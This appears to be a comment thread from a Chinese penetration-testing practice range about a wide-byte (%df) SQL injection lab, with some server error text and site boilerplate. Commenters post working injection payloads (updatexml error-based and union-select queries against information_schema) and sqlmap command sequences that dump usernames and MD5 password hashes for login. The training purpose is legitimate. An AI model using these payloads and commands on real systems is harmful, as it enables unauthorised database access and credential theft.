HTTP/1.1 502 Bad Gateway
Warning: 199 "martian" "dial tcp 124.70.71.251:44193: connectex: No connection could be made because the target machine actively refused it." "Sun, 06 Aug 2023 22:04:53 GMT"
课堂总结:宽字节过滤第一个单引号后 后边的不能再出现单引号了
1:发现group_concat()函数显示不全
2查询语法 反引号和单引号好像都不行,那这样写筛选?表名不需要单引,但表名需要啊
请看实例:and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,1)limit 0,1),0x7e),1) --+
渝公网安备 50019002501238号 
评论(请勿在评论区发表解题思路)
大神,发表一下您的看法吧!登录立即注册
quanguodiyi8/6/2023, 2:06:16 PM
HTTP/1.1 502 Bad Gateway Warning: 199 "martian" "dial tcp 124.70.71.251:44193: connectex: No connection could be made because the target machine actively refused it." "Sun, 06 Aug 2023 22:04:53 GMT"
(0)
Cc.tt5/29/2023, 2:37:49 AM
账号密码拿到了登录的时候登不进去
(4)
171983663104/6/2023, 3:01:09 AM
感谢墨者靶场 尽管自己作为曾经sqlmaap工具手 但是 手注让我更能完成工具完成不了的事 和理解原理
(0)
171983663104/6/2023, 2:58:05 AM
课堂总结:宽字节过滤第一个单引号后 后边的不能再出现单引号了 1:发现group_concat()函数显示不全 2查询语法 反引号和单引号好像都不行,那这样写筛选?表名不需要单引,但表名需要啊 请看实例:and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,1)limit 0,1),0x7e),1) --+
(0)
阿三大苏打12/23/2022, 1:25:44 PM
第一步 使用kali里面 sqlmap sqlmap - u "网站" --current-db --current-user 爆出数据库 第二部 sqlmap - u "网站" -D 数据库名 --tables --batch 爆出表名 第三步 sqlmap - u "网站" -D 数据库名 --T 表名 --columns --batch 爆出列名 第三步 sqlmap - u "网站" -D 数据库名 --T 表名 --dump -C "name,password" --batch 爆出密码 只是总结自己的理解
(0)
LRJ111/11/2022, 7:59:20 AM
@LRJ1:利用宽字节%df绕过转义,爆出账号密码,怎...
好了,今天咋就登上了,KEY已提交。
回复 (0)
LRJ111/8/2022, 4:26:25 PM
利用宽字节%df绕过转义,爆出账号密码,怎么解码(sqlmap也跑了遍)后登入一直显示错误信息。。。是哪出问题了呢?
(2)
west_wind7/14/2022, 9:09:08 AM
@qqqzzz:sqlmap.py -u 219.15...
为啥我用sqlmap扫不出来
回复 (0)
罗先森5/24/2022, 2:41:09 AM
@xiaozhang-w:已经用sqlmap拿到用户名...
有俩个用户都是mozhe,用第二哥解密的密码登录即可。
回复 (1)
冯上3/24/2022, 6:50:21 AM
@thelmc:我就想请问一下 http://219....
单引号转义
回复 (0)
涛哥6663/19/2022, 6:15:50 AM
@qwe1433223:为什么表名的十六进制前面要加0...
因为要告诉数据库后面是16进制,而不是简单的数字了
回复 (0)
白学12/29/2021, 2:27:56 PM
@thelmc:我就想请问一下 http://219....
因为你的表名的单引号也会被魔术引号加上反斜杠进行转义
回复 (0)
白学12/29/2021, 2:26:24 PM
魔术引号主要是将用户输入的单双引号以及反斜杠和空值进行转义。我们要想办法让转义被过滤。
(0)
qqqzzz9/29/2021, 3:16:13 AM
sqlmap.py -u 219.153.49.228:44660/new_list.php?id=1 先看看 然后sqlmap.py -u 219.153.49.228:44660/new_list.php?id=1 --dbs 出数据库 sqlmap.py -u http://219.153.49.228:44471/new_list.php?id=1 -D stormgroup -T member --dump --batch 直接密码就出来了
(0)
xiaozhang-w9/18/2021, 7:27:45 AM
已经用sqlmap拿到用户名和MD5加密的密码,解码后一个用户名禁用,一个总提示密码错误,问题出在哪里了
(4)
初学者121389/15/2021, 2:52:18 AM
%df%27 用这个测试发现报错即存在宽字符注入漏洞 用注入工具url:http://219.153.49.228:46406/new_list.php?id=1%df%27跑 完事获取库 获取表 获取内容 有两行 完事MD5解密登录即可
(0)
thelmc6/21/2021, 11:10:53 AM
我就想请问一下 http://219.153.49.228:44611/new_list.php?id=1.1 %df'union select 1,2,3,4,(select group_concat(table_name) from information_schema.tables where table_schema=database()) -- www 这样可以出现表名,为什么http://219.153.49.228:44611/new_list.php?id=1.1 %df'union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='notice'),4,5 -- www 为什么字段出不了? 这靶场有问题吧 真的很搞人心态 我就差骂人了
(4)
poplar@墨者4/29/2021, 3:44:21 AM
@djhd:得到md5,解密后全部登不上。。。。...
您好,经过测试,本环境是没有问题的;您后续有什么问题的话,可以进QQ群反馈。
回复 (0)
大文4/25/2021, 2:25:41 PM
直接%df'过
(0)
qwe14332234/19/2021, 6:36:04 PM
@初冬123:宽字节原理自己百度,这是推荐:http:...
为什么表名的十六进制前面要加0x啊
回复 (0)